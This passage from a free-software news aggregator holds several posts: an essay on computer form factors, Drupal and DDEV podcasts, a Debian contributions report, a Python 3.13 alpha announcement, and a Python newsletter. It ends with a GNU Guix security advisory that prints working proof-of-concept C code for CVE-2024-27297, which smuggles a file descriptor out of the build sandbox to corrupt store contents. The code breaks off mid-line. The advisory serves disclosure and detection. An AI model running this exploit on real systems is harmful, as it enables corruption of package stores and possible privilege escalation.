FLOSS Project Planets
Qt for MCUs 2.7 released
A new version of Qt for MCUs is available, bringing new features to the Qt Quick Ultralite engine, additional microcontrollers, and various improvements to our GUI framework for resource-constrained embedded systems.
Russell Coker: The Shape of Computers
There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to.
This means that further development in the size and shape of computers will largely be determined by human factors.
I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.
Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.
Desktop/Laptop PCsWhen home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the Raspberry Pi 400 [1] which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a “add a screen to make a laptop” as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.
The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.
The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment text editing with a touch screen is an unsolved problem in computer science [2].
The Lenovo Thinkpad X1 Fold [3] and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US.
I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don’t work well for small devices and touch devices and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.
We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn’t take off largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.
The Interesting New Things Watch LikeThe wrist-watch [4] has been a standard format for easy access to data when on the go since it’s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as “pocket watches” for about 10 years.
The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the calculator watch [5] which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?
Phone LikeFolding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). Phones and tablets with multiple folds are coming out now [6]. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. I’ve previously written about Convergence between phones and desktop computers [7], the increased capabilities of phones adds to the case for Convergence.
Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them), it will be interesting to see how that goes.
Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that’s enough for a lot of phone functionality.
The Rabbit R1 [8] and the Humane AI Pin [9] have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.
Laptop LikeOne interesting PC variant I just discovered is the Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.
The recent release of the Apple Vision Pro [11] has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about the possibility of using augmented reality technology for providing a desktop computing environment [12]. I wonder how a Vision Pro would work for that on a train or passenger jet.
Another interesting thing that’s on offer is a laptop with 7″ touch screen beside the keyboard [13]. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.
Useful Hardware for Developing These ThingsI recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14], and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap.
The PineTime is a nice smart watch from Pine64 which is designed to be open [15]. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the Raspberry Pi Watch [16] is interesting too.
The PinePhonePro is an OK phone made to open standards but it’s hardware isn’t as good as Android phones released in the same year [17]. I’ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18], but it’s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day.
Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well.
What We Must DoDebian appears to have some voice input software in the pocketsphinx package but no documentation on how it’s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn’t get it going.
To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.
Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done – even today’s hardware of connecting a small laptop to an external monitor doesn’t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven’t investigated this properly yet, it definitely doesn’t work in an expected manner in Ubuntu 22.04 and I haven’t yet tested the combinations on Debian/Unstable.
ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.
Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it’s own special apps it’s not usable in a “I want to run applications that use any files from any other applicationsin any way I want” sense. My post about Sandboxing Phone apps is relevant for people who are interested in this [19]. We also need to extend security models to cope with things like “ok google” type functionality which has the potential to be a bug and the emerging class of LLM based attacks.
I will write more posts about these thing.
Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.
- [1] https://www.raspberrypi.com/products/raspberry-pi-400/
- [2] https://jenson.org/text/
- [3] http://tinyurl.com/27lrakl6
- [4] https://en.wikipedia.org/wiki/Watch
- [5] https://en.wikipedia.org/wiki/Calculator_watch
- [6] http://tinyurl.com/27gb7zrq
- [7] https://etbe.coker.com.au/2023/05/29/considering-convergence/
- [8] http://tinyurl.com/yuurhkvm
- [9] http://tinyurl.com/ytmw42bt
- [10] https://www.aliexpress.com/store/1103322555
- [11] https://en.wikipedia.org/wiki/Apple_Vision_Pro
- [12] https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/
- [13] https://www.aliexpress.com/item/1005005999353358.html
- [14] https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/
- [15] https://etbe.coker.com.au/2023/10/21/more-about-pinetime/
- [16] http://tinyurl.com/24myjjqn
- [17] https://etbe.coker.com.au/2023/10/11/pinephone-status/
- [18] https://etbe.coker.com.au/2022/03/19/more-librem5/
- [19] https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/
Related posts:
- My Ideal Mobile Phone Based on my experience testing the IBM Seer software on...
- Do Desktop Computers Make Sense? Laptop vs Desktop Price Currently the smaller and cheaper USB-C...
- Mobile Phones Are Computers One thing I noticed when I got my new LG...
Tag1 Consulting: The DDEV Local Development Environment: Talking with Maintainer Randy Fay
Randy Fay, the maintainer of DDEV discusses the key features and functionalities of DDEV, a Docker-based development environment that streamlines setting up and managing local development for applications (no Docker knowledge is required). Whether you're creating applications in Python, PHP, or other languages, DDEV will save you tremendous time and effort. It also works great for managing multiple projects, or working with a large distributed team, ensuring everyone’s configurations remain in sync. Randy also demos DDEV, showcasing how fast and easy it is to set up a local Drupal development environment quickly. Additionally, he touches upon the history and future of DDEV, and the critical role of the DDEV user community in both supporting the project and shaping it’s development. This interview is perfect for any developer interested in efficient development tools, current DDEV users, or anyone curious about local development technologies and best practices. --- For a transcript of this video, see The DDEV Local Development Environment- Talking with Randy Fay --- ## Links - DDEV: ddev.com - Docs https://ddev.readthedocs.io - CMS Quickstarts https://ddev.readthedocs.io/en/stable/users/quickstart/ - DDEV 2023 Review https://ddev.com/blog/2023-review - [DDEV 2024 Plans](https://ddev.com/blog/2024-plans...
Read more michaelemeyers Wed, 03/13/2024 - 04:40Talk Python to Me: #453: uv - The Next Evolution in Python Packages?
Talking Drupal: Skills Upgrade 2
Welcome back to “Skills Upgrade” a Talking Drupal mini-series following the journey of a D7 developer learning D10. This is episode 2.
Topics- Review Chad's goals for the previous week
- DDEV Installation
- Docker for Mac vs other options
- IDE Setup
- Review Chad's questions
- Tasks for the upcoming week
- DDEV improve performance
- Install Drupal 10
- Install drupal/core dependencies
- Configure and test phpcs
- Test phpstan
- Set up settings.local.php
- Install devel module
DDEV Performance DDEV Quickstart Drupal Core Dependencies How to Implement Drupal Code Standards Running PHPStan On Drupal Custom Modules Why you should care about using settings.local.php Rancher Desktop
Chad's Drupal 10 Learning Curriclum & Journal Chad's Drupal 10 Learning Notes
HostsAmyJune Hineline - @volkswagenchick
GuestsChad Hester - chadkhester.com @chadkhest Mike Anello - DrupalEasy.com @ultimike
Freexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)
Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.
/usr-move, by Helmut GrohneMuch of the work was spent on handling interaction with time time64 transition and sending patches for mitigating fallout. The set of packages relevant to debootstrap is mostly converted and the patches for glibc and base-files have been refined due to feedback from the upload to Ubuntu noble. Beyond this, he sent patches for all remaining packages that cannot move their files with dh-sequence-movetousr and packages using dpkg-divert in ways that dumat would not recognize.
Upcoming improvements to Salsa CI, by Santiago Ruano RincónLast month, Santiago Ruano Rincón started the work on integrating sbuild into the Salsa CI pipeline. Initially, Santiago used sbuild with the unshare chroot mode. However, after discussion with josch, jochensp and helmut (thanks to them!), it turns out that the unshare mode is not the most suitable for the pipeline, since the level of isolation it provides is not needed, and some test suites would fail (eg: krb5). Additionally, one of the requirements of the build job is the use of ccache, since it is needed by some C/C++ large projects to reduce the compilation time. In the preliminary work with unshare last month, it was not possible to make ccache to work.
Finally, Santiago changed the chroot mode, and now has a couple of POC (cf: 1 and 2) that rely on the schroot and sudo, respectively. And the good news is that ccache is successfully used by sbuild with schroot!
The image here comes from an example of building grep. At the end of the build, ccache -s shows the statistics of the cache that it used, and so a little more than half of the calls of that job were cacheable. The most important pieces are in place to finish the integration of sbuild into the pipeline.
Other than that, Santiago also reviewed the very useful merge request !346, made by IOhannes zmölnig to autodetect the release from debian/changelog. As agreed with IOhannes, Santiago is preparing a merge request to include the release autodetection use case in the very own Salsa CI’s CI.
Packaging simplemonitor, by Carles Pina i EstanyCarles started using simplemonitor in 2017, opened a WNPP bug in 2022 and started packaging simplemonitor dependencies in October 2023. After packaging five direct and indirect dependencies, Carles finally uploaded simplemonitor to unstable in February.
During the packaging of simplemonitor, Carles reported a few issues to upstream. Some of these were to make the simplemonitor package build and run tests reproducibly. A reproducibility issue was reprotest overriding the timezone, which broke simplemonitor’s tests. There have been discussions on resolving this upstream in simplemonitor and in reprotest, too.
Carles also started upgrading or improving some of simplemonitor’s dependencies.
Miscellaneous contributions- Stefano Rivera spent some time doing admin on debian.social infrastructure. Including dealing with a spike of abuse on the Jitsi server.
- Stefano started to prepare a new release of dh-python, including cleaning out a lot of old Python 2.x related code. Thanks to Niels Thykier (outside Freexian) for spear-heading this work.
- DebConf 24 planning is beginning. Stefano discussed venues and finances with the local team and remotely supported a site-visit by Nattie (outside Freexian).
- Also in the DebConf 24 context, Santiago took part in discussions and preparations related to the Content Team.
- A JIT bug was reported against pypy3 in Debian Bookworm. Stefano bisected the upstream history to find the patch (it was already resolved upstream) and released an update to pypy3 in bookworm.
- Enrico participated in /usr-merge discussions with Helmut.
- Colin Watson backported a python-channels-redis fix to bookworm, rediscovered while working on debusine.
- Colin dug into a cluster of celery build failures and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable. celery should be back in testing once the 64-bit time_t migration is out of the way.
- Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately upstream changed the naming of their release tags, so updating the watch file was a bit demanding. Anyway this version 2.0 is a huge step towards introduction of the new Common Print Dialog Backends.
- Helmut send patches for 48 cross build failures.
- Helmut changed debvm to use mkfs.ext4 instead of genext2fs.
- Helmut sent a debci MR for improving collector robustness.
- In preparation for DebConf 25, Santiago worked on the Brest Bid.
The Drop Times: The Revolutionary Impact of Gander Automated Performance Testing
Python Insider: Python 3.13.0 alpha 5 is now available
Python 3.13.0 alpha 5 is now available:
This is an early developer preview of Python 3.13
Major new features of the 3.13 series, compared to 3.12Python 3.13 is still in development. This release, 3.13.0a5, is the fifth of six planned alpha releases.
Alpha releases are intended to make it easier to test the current state of new features and bug fixes and to test the release process.
During the alpha phase, features may be added up until the start of the beta phase (2024-05-07) and, if necessary, may be modified or deleted up until the release candidate phase (2024-07-30). Please keep in mind that this is a preview release and its use is not recommended for production environments.
Many new features for Python 3.13 are still being planned and written. Work continues apace on both the work to remove the Global Interpeter Lock , and to improve Python performance. The most notable changes so far:
- In the interactive interpreter, exception tracebacks are now colorized by default .
- A preliminary, experimental JIT was added, providing the ground work for significant performance improvements.
- Docstrings now have their leading indentation stripped , reducing memory use and the size of .pyc files. (Most tools handling docstrings already strip leading indentation.)
- The dbm module has a new dbm.sqlite3 backend that is used by default when creating new files.
- PEP 594 (Removing dead batteries from the standard library) scheduled removals of many deprecated modules: aifc, audioop, chunk, cgi, cgitb, crypt, imghdr, mailcap, msilib, nis, nntplib, ossaudiodev, pipes, sndhdr, spwd, sunau, telnetlib, uu, xdrlib, lib2to3.
- Many other removals of deprecated classes, functions and methods in various standard library modules.
- New deprecations , most of which are scheduled for removal from Python 3.15 or 3.16.
- C API removals and deprecations. (Some removals present in alpha 1 have been reverted in alpha 2, as the removals were deemed too disruptive at this time.)
(Hey, fellow core developer, if a feature you find important is missing from this list, let Thomas know.)
The next pre-release of Python 3.13 will be 3.13.0a6, currently scheduled for 2024-04-09.
More resources- Online Documentation
- PEP 719 , 3.13 Release Schedule
- Report bugs at Issues · python/cpython · GitHub.
- Help fund Python directly (or via GitHub Sponsors), and support the Python community.
Thanks to all of the many volunteers who help make Python Development and these releases possible! Please consider supporting our efforts by volunteering yourself or through organization contributions to the Python Software Foundation.
Regards from wet and chilly Amsterdam,Your release team,
Thomas Wouters
Ned Deily
Steve Dower
Łukasz Langa
PyCoder’s Weekly: Issue #620 (March 12, 2024)
#620 – MARCH 12, 2024
View in Browser »
In this video course, you’ll learn how to integrate Celery and Django using Redis as a message broker. You’ll refactor the synchronous email sending functionality of an existing Django app into an asynchronous task that you’ll run with Celery instead.
REAL PYTHON course
The Context Manager is gets used for all kind of interesting things around blocks of code. This article gives a background about the origins of the context manager, which problem it solves and how to use it.
BJÖRN RICKS • Shared by Björn Ricks
If you’ve ever been curious about Sentry or application performance monitoring, Launch Week is for you. Tune in from March 18-22 to get the scoop on new products, new features, and a bunch of other cool stuff. You can get a sneak peek (and win free swag) if you RSVP. It’s a win-win →
SENTRY sponsor
This comprehensive user guide equips you with the skills required to use Python Polars Data Frames effectively for financial and supply chain data science analytics.
AMIT SHUKLA • Shared by Amit Shukla
How do you get yourself unstuck when facing a programming problem? How do you develop a positive developer mindset while learning Python? This week on the show, Bob Belderbos from Pybites is here to talk about learning Python and building healthy developer habits.
REAL PYTHON podcast
This post talks about how to go from a slow, synchronous process, to a highly concurrent and lightning fast asyncio process. This article starts from the problem in it’s most basic form and incrementally shows you how to move towards concurrency with Asyncio in Python.
SKYLER LEWIS • Shared by CHernandez
Elevate your Python skills with our FREE ebook containing 250 Bulletproof Python Tips. Ideal for developers eager to refine their coding prowess with practical, instantly applicable advice. Transform your Python code and join a thriving community of Python enthusiasts today →
PYBITES sponsor
This article walks you through setting up a CI/CD pipeline using Github Actions for Python projects, that trigger on git tag pushes. It also includes a way of handling CI pipeline errors for any point of failure.
DHRUV AHUJA • Shared by Dhruv Ahuja
In this tutorial, you’ll learn about wildcard imports and the __all__ variable in Python. With __all__, you can prepare your packages and modules for wildcard imports, which are a quick way to import everything.
REAL PYTHON
How you unit test machine learning code differs from typical software practices and simply using mock often doesn’t cut it. This post covers alternative ways of testing your ML software.
EUGENE YAN
Many Python libraries that deal with Excel only handle data, but OpenPyXL gives you the ability to style your cells in many different ways. Learn how to give your spreadsheets pizazz!
MIKE DRISCOLL
Max adapts some StackOverflow code to handle multiple output streams in parallel, giving you a quick way to handle the output from concurrent processes at the same time.
MAX BERNSTEIN
This tutorial teaches the mechanics of the data structure collections.deque, using seven example use cases where deque simplifies the implementation of a function.
RODRIGO GIRÃO SERRÃO • Shared by Rodrigo Girão Serrão
A seed database is one with initial data for your project. They can be useful when testing and in CI/CD pipelines. This article shows you how to create them in Django.
KARL FREDRIK HAUGHLAND
The article shows examples of using timezones with datetime objects, using the zoneinfo module added in the standard library in Python 3.9.
MARKKU LEINIÖ • Shared by Markku Leiniö
Save time and resources by building on top of our open-source sample apps. Get a headstart on development and deploy your AI apps faster with Intel’s OpenVINO toolkit.
INTEL CORPORATION sponsor
Dependency management can be a hurdle for newcomers to Python, and this article argues that better defaults would be the right answer.
MAT DUGGAN
Python does have generics! Learn how to use typing TypeVar and Generic to reuse code with proper typing.
GUI LATROVA • Shared by Gui Latrova
GITHUB.COM/PYPROJECTX • Shared by Ivo Houbrechts
modguard: Enforce a Decoupled Architecture Events What’s New in Wagtail CMS Webinar March 12 to March 13, 2024
WAGTAIL.ORG • Shared by Thibaud Colas
March 13, 2024
REALPYTHON.COM
March 14 to March 15, 2024
MEETUP.COM
March 15 to March 18, 2024
PYCON.SK
March 15 to March 17, 2024
DJANGOGIRLS.ORG
March 15 to March 16, 2024
MEETUP.COM
Happy Pythoning!
This was PyCoder’s Weekly Issue #620.
View in Browser »
[ Subscribe to 🐍 PyCoder’s Weekly 💌 – Get the best Python news, articles, and tutorials delivered to your inbox once a week >> Click here to learn more ]
Balint Pekker: The Future of Drupal
GNU Guix: Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)
A security issue has been identified in guix-daemon which allows for fixed-output derivations, such as source code tarballs or Git checkouts, to be corrupted by an unprivileged user. This could also lead to local privilege escalation. This was originally reported to Nix but also affects Guix as we share some underlying code from an older version of Nix for the guix-daemon. Readers only interested in making sure their Guix is up to date and no longer affected by this vulnerability can skip down to the "Upgrading" section.
VulnerabilityThe basic idea of the attack is to pass file descriptors through Unix sockets to allow another process to modify the derivation contents. This was first reported to Nix by jade and puckipedia with further details and a proof of concept here. Note that the proof of concept is written for Nix and has been adapted for GNU Guix below. This security advisory is registered as CVE-2024-27297 (details are also available at Nix's GitHub security advisory) and rated "moderate" in severity.
A fixed-output derivation is one where the output hash is known in advance. For instance, to produce a source tarball. The GNU Guix build sandbox purposefully excludes network access (for security and to ensure we can control and reproduce the build environment), but a fixed-output derivation does have network access, for instance to download that source tarball. However, as stated, the hash of output must be known in advance, again for security (we know if the file contents would change) and reproducibility (should always have the same output). The guix-daemon handles the build process and writing the output to the store, as a privileged process.
In the build sandbox for a fixed-output derivation, a file descriptor to its contents could be shared with another process via a Unix socket. This other process, outside of the build sandbox, can then modify the contents written to the store, changing them to something malicious or otherwise corrupting the output. While the output hash has already been determined, these changes would mean a fixed-output derivation could have contents written to the store which do not match the expected hash. This could then be used by the user or other packages as well.
MitigationThis security issue (tracked here for GNU Guix) has been fixed by two commits by Ludovic Courtès. Users should make sure they have updated to this second commit to be protected from this vulnerability. Upgrade instructions are in the following section.
While several possible mitigation strategies were detailed in the original report, the simplest fix is just copy the derivation output somewhere else, deleting the original, before writing to the store. Any file descriptors will no longer point to the contents which get written to the store, so only the guix-daemon should be able to write to the store, as designed. This is what the Nix project used in their own fix. This does add an additional copy/delete for each file, which may add a performance penalty for derivations with many files.
A proof of concept by Ludovic, adapted from the one in the original Nix report, is available at the end of this post. One can run this code with
guix build -f fixed-output-derivation-corruption.scm -M4This will output whether the current guix-daemon being used is vulnerable or not. If it is vulnerable, the output will include a line similar to
We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!The corrupted file can be removed with
guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*In general, corrupt files from the store can be found with
guix gc --verify=contentswhich will also include any files corrupted by through this vulnerability. Do note that this command can take a long time to complete as it checks every file under /gnu/store, which likely has many files.
UpgradingDue to the severity of this security advisory, we strongly recommend all users to upgrade their guix-daemon immediately.
For a Guix System the procedure is just reconfiguring the system after a guix pull, either restarting guix-daemon or rebooting. For example,
guix pull sudo guix system reconfigure /run/current-system/configuration.scm sudo herd restart guix-daemonwhere /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.
For Guix running as a package manager on other distributions, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service. For example, on a system using systemd to manage services,
sudo --login guix pull sudo systemctl restart guix-daemon.serviceNote that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.
ConclusionOne of the key features and design principles of GNU Guix is to allow unprivileged package management through a secure and reproducible build environment. While every effort is made to protect the user and system from any malicious actors, it is always possible that there are flaws yet to be discovered, as has happened here. In this case, using the ingredients of how file descriptors and Unix sockets work even in the isolated build environment allowed for a security vulnerability with moderate impact.
Our thanks to jade and puckipedia for the original report, and Picnoir for bringing this to the attention of the GNU Guix security team. And a special thanks to Ludovic Courtès for a prompt fix and proof of concept.
Note that there are current efforts to rewrite the guix-daemon in Guile by Christopher Baines. For more information and the latest news on this front, please refer to the recent blog post and this message on the guix-devel mailing list.
Proof of ConceptBelow is code to check if a guix-daemon is vulnerable to this exploit. Save this file as fixed-output-derivation-corruption.scm and run following the instructions above, in "Mitigation." Some further details and example output can be found on issue #69728
;; Checking for CVE-2024-27297. ;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>. (use-modules (guix) (guix modules) (guix profiles) (gnu packages) (gnu packages gnupg) (gcrypt hash) ((rnrs bytevectors) #:select (string->utf8))) (define (compiled-c-code name source) (define build-profile (profile (content (specifications->manifest '("gcc-toolchain"))))) (define build (with-extensions (list guile-gcrypt) (with-imported-modules (source-module-closure '((guix build utils) (guix profiles))) #~(begin (use-modules (guix build utils) (guix profiles)) (load-profile #+build-profile) (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output))))) (computed-file name build)) (define sender-source (plain-file "sender.c" " #include <sys/socket.h> #include <sys/un.h> #include <stdlib.h> #include <stddef.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> int main(int argc, char **argv) { setvbuf(stdout, NULL, _IOLBF, 0); int sock = socket(AF_UNIX, SOCK_STREAM, 0); // Set up an abstract domain socket path to connect to. struct sockaddr_un data; data.sun_family = AF_UNIX; data.sun_path[0] = 0; strcpy(data.sun_path + 1, \"dihutenosa\"); // Now try to connect, To ensure we work no matter what order we are // executed in, just busyloop here. int res = -1; while (res < 0) { printf(\"attempting connection...\\n\"); res = connect(sock, (const struct sockaddr *)&data, offsetof(struct sockaddr_un, sun_path) + strlen(\"dihutenosa\") + 1); if (res < 0 && errno != ECONNREFUSED) perror(\"connect\"); if (errno != ECONNREFUSED) break; usleep(500000); } // Write our message header. struct msghdr msg = {0}; msg.msg_control = malloc(128); msg.msg_controllen = 128; // Write an SCM_RIGHTS message containing the output path. struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); hdr->cmsg_len = CMSG_LEN(sizeof(int)); hdr->cmsg_level = SOL_SOCKET; hdr->cmsg_type = SCM_RIGHTS; int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640); memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); msg.msg_controllen = CMSG_SPACE(sizeof(int)); // Write a single null byte too. msg.msg_iov = malloc(sizeof(struct iovec)); msg.msg_iov[0].iov_base = \"\"; msg.msg_iov[0].iov_len = 1; msg.msg_iovlen = 1; // Send it to the othher side of this connection. res = sendmsg(sock, &msg, 0); if (res < 0) perror(\"sendmsg\"); int buf; // Wait for the server to close the socket, implying that it has // received the commmand. recv(sock, (void *)&buf, sizeof(int), 0); }")) (define receiver-source (mixed-text-file "receiver.c" " #include <sys/socket.h> #include <sys/un.h> #include <stdlib.h> #include <stddef.h> #include <stdio.h> #include <unistd.h> #include <sys/inotify.h> int main(int argc, char **argv) { int sock = socket(AF_UNIX, SOCK_STREAM, 0); // Bind to the socket. struct sockaddr_un data; data.sun_family = AF_UNIX; data.sun_path[0] = 0; strcpy(data.sun_path + 1, \"dihutenosa\"); int res = bind(sock, (const struct sockaddr *)&data, offsetof(struct sockaddr_un, sun_path) + strlen(\"dihutenosa\") + 1); if (res < 0) perror(\"bind\"); res = listen(sock, 1); if (res < 0) perror(\"listen\"); while (1) { setvbuf(stdout, NULL, _IOLBF, 0); printf(\"accepting connections...\\n\"); int a = accept(sock, 0, 0); if (a < 0) perror(\"accept\"); struct msghdr msg = {0}; msg.msg_control = malloc(128); msg.msg_controllen = 128; // Receive the file descriptor as sent by the smuggler. recvmsg(a, &msg, 0); struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); while (hdr) { if (hdr->cmsg_level == SOL_SOCKET && hdr->cmsg_type == SCM_RIGHTS) { int res; // Grab the copy of the file descriptor. memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int)); printf(\"preparing our hand...\\n\"); ftruncate(res, 0); // Write the expected contents to the file, tricking Nix // into accepting it as matching the fixed-output hash. write(res, \"hello, world\\n\", strlen(\"hello, world\\n\")); // But wait, the file is bigger than this! What could // this code hide? // First, we do a bit of a hack to get a path for the // file descriptor we received. This is necessary because // that file doesn't exist in our mount namespace! char buf[128]; sprintf(buf, \"/proc/self/fd/%d\", res); // Hook up an inotify on that file, so whenever Nix // closes the file, we get notified. int inot = inotify_init(); inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE); // Notify the smuggler that we've set everything up for // the magic trick we're about to do. close(a); // So, before we continue with this code, a trip into Nix // reveals a small flaw in fixed-output derivations. When // storing their output, Nix has to hash them twice. Once // to verify they match the \"flat\" hash of the derivation // and once more after packing the file into the NAR that // gets sent to a binary cache for others to consume. And // there's a very slight window inbetween, where we could // just swap the contents of our file. But the first hash // is still noted down, and Nix will refuse to import our // NAR file. To trick it, we need to write a reference to // a store path that the source code for the smuggler drv // references, to ensure it gets picked up. Continuing... // Wait for the next inotify event to drop: read(inot, buf, 128); // first read + CA check has just been done, Nix is about // to chown the file to root. afterwards, refscanning // happens... // Empty the file, seek to start. ftruncate(res, 0); lseek(res, 0, SEEK_SET); // We swap out the contents! static const char content[] = \"This file has been corrupted!\\n\"; write(res, content, strlen (content)); close(res); printf(\"swaptrick finished, now to 